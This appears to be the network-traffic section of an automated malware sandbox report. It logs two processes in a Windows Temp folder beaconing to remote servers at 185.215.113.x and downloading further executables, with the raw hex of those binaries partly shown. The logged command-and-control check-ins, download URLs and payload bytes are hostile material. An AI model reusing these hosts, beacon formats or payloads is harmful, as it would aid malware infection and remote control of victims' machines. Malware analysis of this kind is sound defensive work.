                                                                          35192.168.2.549756185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:35.668064117 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:36.380700111 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:36 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:36.387485981 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:36.728775024 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:36 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.549757185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:36.306492090 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000349001&unit=246122658369
                                                                          Sep 27, 2024 04:21:36.986148119 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:36 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.549758185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:36.875870943 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:37.589122057 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:37.979578018 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:38.216197014 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:38 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.549759185.215.113.103805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:37.058609962 CEST57OUTGET /steam/random.exe HTTP/1.1
                                                                          Host: 185.215.113.103
                                                                          Sep 27, 2024 04:21:37.790895939 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:37 GMT
                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                          Last-Modified: Fri, 27 Sep 2024 01:43:45 GMT
                                                                          ETag: "1be200-6230ffc554407"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 1827328
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 60 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 76 d4 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CXmYpy`\nRichPEL/f$`i@iv@P%d% %(@.rsrc %8@.idata %8@ )%:@niikbxzgO~<@nnynhmhkPi@.taggant0`i"@
                                                                          Sep 27, 2024 04:21:37.791055918 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:21:37.791074038 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:21:37.791085005 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:21:37.791095972 CEST1236INData Raw: 4d a6 cc f4 47 22 5e 2d 52 b2 54 00 13 77 ae e9 4e d4 0c 18 00 cd ab 46 f4 f5 ca ff 52 76 65 21 5f 5e 26 34 5f 0a 18 14 db eb 75 63 4f 24 41 b2 d8 de 57 40 06 19 00 16 84 59 c8 ff b3 75 14 e7 15 58 18 80 23 38 ea fd f2 2c da 44 ea c2 78 59 c5 84
                                                                          Data Ascii: MG"^-RTwNFRve!_^&4_ucO$AW@YuX#8,DxYX" p!ZD7}X_sI%LNqAd[cf^|ZV\&e2eVHsjA3qAbDek$%XJR6,nCOMNZ=<3
                                                                          Sep 27, 2024 04:21:37.791106939 CEST1236INData Raw: 4e fe 40 12 00 44 87 65 fa c0 93 08 99 cc 56 34 47 9c 58 46 21 14 5b 39 c2 30 0c 56 e9 55 af 05 7a 65 ce f3 4c b0 cd 86 e6 26 2f c7 e6 bb e4 5a 0b 9e fe 7c df 5d eb eb cc 90 7d 11 8a 45 99 b3 a7 63 60 14 26 51 42 d4 49 dd 38 99 b6 45 8c d7 6d 04
                                                                          Data Ascii: N@DeV4GXF![90VUzeL&/Z|]}Ec`&QBI8Ema3^~g:}RVpAMF_[S%AcEVU)X|B"OQPZ\_p7%IKp4_9]2@_>~$z
                                                                          Sep 27, 2024 04:21:37.791117907 CEST1236INData Raw: cf 11 60 7f a3 fc a3 9f d4 da 04 74 22 c9 66 e1 ce e4 61 b4 5e c6 57 53 00 d0 67 e1 4d 96 d8 e2 de 11 54 3f 42 b3 61 30 ba 5b b7 f6 e5 41 5d 11 5a dd 24 6c ea 5b 90 d3 6d fa 5d 87 42 01 0b e1 ed 5b 4c e6 25 7a 88 a7 e0 67 7c 5b 63 63 8f bf c6 bd
                                                                          Data Ascii: `t"fa^WSgMT?Ba0[A]Z$l[m]B[L%zg|[ccRH+\]:tU2fu]#`R/+U`O&Sye'_$X?4^f`T\fX]}j00B]?B\v_F>]o"}[$2lL|V{
                                                                          Sep 27, 2024 04:21:37.791131020 CEST1236INData Raw: 87 1a 5d df 31 42 7f bd 31 1c b5 57 42 d3 d8 f1 df f4 c9 72 82 e2 e4 e8 ff 69 67 d8 45 b2 e4 33 7e dc 14 e0 ad cc d0 19 ee eb bc af 42 d3 38 f2 94 f3 8c 17 09 c2 88 ff d5 a4 56 8d 59 d3 e0 b2 43 e2 6c e8 ff f5 67 74 51 66 a6 dc 0d 49 5d 1f 46 46
                                                                          Data Ascii: ]1B1WBrigE3~B8VYClgtQfI]FF(HW1tgis t@Z_zU]WZucgMnV]=:2]+B!M\+dt]]]O>Hvjm/w6VetO-
                                                                          Sep 27, 2024 04:21:37.791141033 CEST1236INData Raw: 56 dc ec e0 08 d6 fc 53 9b 82 25 e0 85 42 76 b3 56 76 42 9a 96 d3 54 b3 46 d3 95 6f ca a9 c8 11 ba 2a d2 c2 2b 91 cc 0f 0c 6b 55 b6 c5 42 bc 42 77 ca 84 5f d7 dc 12 66 c6 85 53 0f 5f d3 94 d7 72 48 8f 5f 4a 28 a4 70 d7 2d 4c 6b 4c 08 64 01 75 42
                                                                          Data Ascii: VS%BvVvBTFo*+kUBBw_fS_rH_J(p-LkLduBM~&V;HDi Rsqf`'|,dU]Bc*vfdH+VS?yyuF_1gXQF>]k)}]&0{R]"_vLKLG]BP
                                                                          Sep 27, 2024 04:21:37.791152954 CEST1236INData Raw: 29 ce fd de 84 41 b9 93 f1 76 c0 e3 ae ad e9 ee cd 52 a3 11 d6 e1 f9 e4 d8 44 c1 d7 ed 2e ea f6 1c 18 b7 af de 89 65 27 c9 e0 1d dc 65 48 c5 a2 c5 66 a9 a7 38 fa 39 21 5b 26 f4 23 ce fa cf 6f 43 77 80 20 b4 12 51 1f c5 c6 a7 4c 3e c0 64 37 90 c7
                                                                          Data Ascii: )AvRD.e'eHf89![&#oCw QL>d76.'xO\TZfy38wi90C&sP9EO]~P>:HkveR;Pa0I'Zx8c}.9]X\J&0C$f\BeN^lT#DeVf
                                                                          Sep 27, 2024 04:21:37.796883106 CEST1236INData Raw: a8 f6 ec 01 26 9c dd 93 4e 26 c8 46 13 be ac b2 b4 ac 6c 39 cb fc 2a 0e 8e 5b a1 e2 a4 92 36 20 5f c7 2e dc a1 b4 87 59 2f ac 9d bf fb a1 28 96 8d ab e0 ba 1c ff 34 95 c4 d1 38 12 b4 ca 56 08 65 6e 3a 41 7d 10 60 05 b1 c3 21 c6 d3 d3 09 e6 d0 ec
                                                                          Data Ascii: &N&Fl9*[6 _.Y/(48Ven:A}`!>PNJE?#%J[<,AclUe{Z\s!OjId2KD#RB!}U$IXvBNYYe4SP!Mgs=fMIbno,


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.549760185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:38.359677076 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:39.063846111 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:38 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:39.161262035 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:39.393877029 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:39 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.549762185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:39.602582932 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:40.404690027 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:40.598401070 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:40.829926968 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.549763185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:40.619419098 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000354001&unit=246122658369
                                                                          Sep 27, 2024 04:21:41.326980114 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.549765185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:41.050734043 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:41.711424112 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:41.783025980 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:42.010270119 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          43192.168.2.549766185.215.113.103805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:41.448585033 CEST56OUTGET /mine/random.exe HTTP/1.1
                                                                          Host: 185.215.113.103
                                                                          Sep 27, 2024 04:21:42.150799036 CEST1236INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 Sep 2024 02:21:42 GMT
                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                          Last-Modified: Fri, 27 Sep 2024 02:17:24 GMT
                                                                          ETag: "1d7200-6231074af51cc"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 1929728
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 a0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfL@L`@WkL@L @.rsrc@.idata @ +@ewzoukzh`02X@eahzsgudLL@.taggant0L"P@
                                                                          Sep 27, 2024 04:21:42.150815964 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:21:42.150830030 CEST448INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:21:42.150840998 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 27, 2024 04:21:42.150851011 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: ^*y&PijzwQ0VXd9
                                                                          Sep 27, 2024 04:21:42.150861979 CEST1236INData Raw: 88 08 fd 98 be 88 51 94 e4 99 39 8a 7e 8b c8 bd e6 c8 5d d0 d2 bf 35 39 a9 60 4d 28 9f 75 ea 4a 8f 1c 3f e8 a2 b9 59 19 ed 78 4e a5 c5 48 5e 70 07 35 51 64 7e 88 5e 18 1b ba fd c1 77 aa 81 fe eb 19 b9 e9 fe cb 75 e5 b7 20 b5 45 cb b8 2c 54 cd 18
                                                                          Data Ascii: Q9~]59`M(uJ?YxNH^p5Qd~^wu E,TMr69]=.tN,^HL~Wg_-D55yAdUTVNmYU4L(YMuv]L>Wi(I+iSM8]I5
                                                                          Sep 27, 2024 04:21:42.150875092 CEST1236INData Raw: 70 10 bf 52 c4 95 b9 01 f3 3b 7e 95 76 99 d6 0b 4a 53 1d 75 72 1a 37 30 a0 5a fc 78 39 2a be 45 02 11 f3 98 d8 c5 ef c5 c2 45 7a 52 24 2b 0b 4a 5e df bb 99 9d 60 81 44 09 8a 14 70 cd 86 9e 5b 53 3d 4d 94 d8 16 16 16 50 1a 0e 5b 6b 0d 0d 81 06 3e
                                                                          Data Ascii: pR;~vJSur70Zx9*EEzR$+J^`Dp[S=MP[k>!^!K6EYTOTA0d\-VpTM-#Hu:b<:r!`8j?wJ-MoEAHdHnTHs=Y;("Ghd
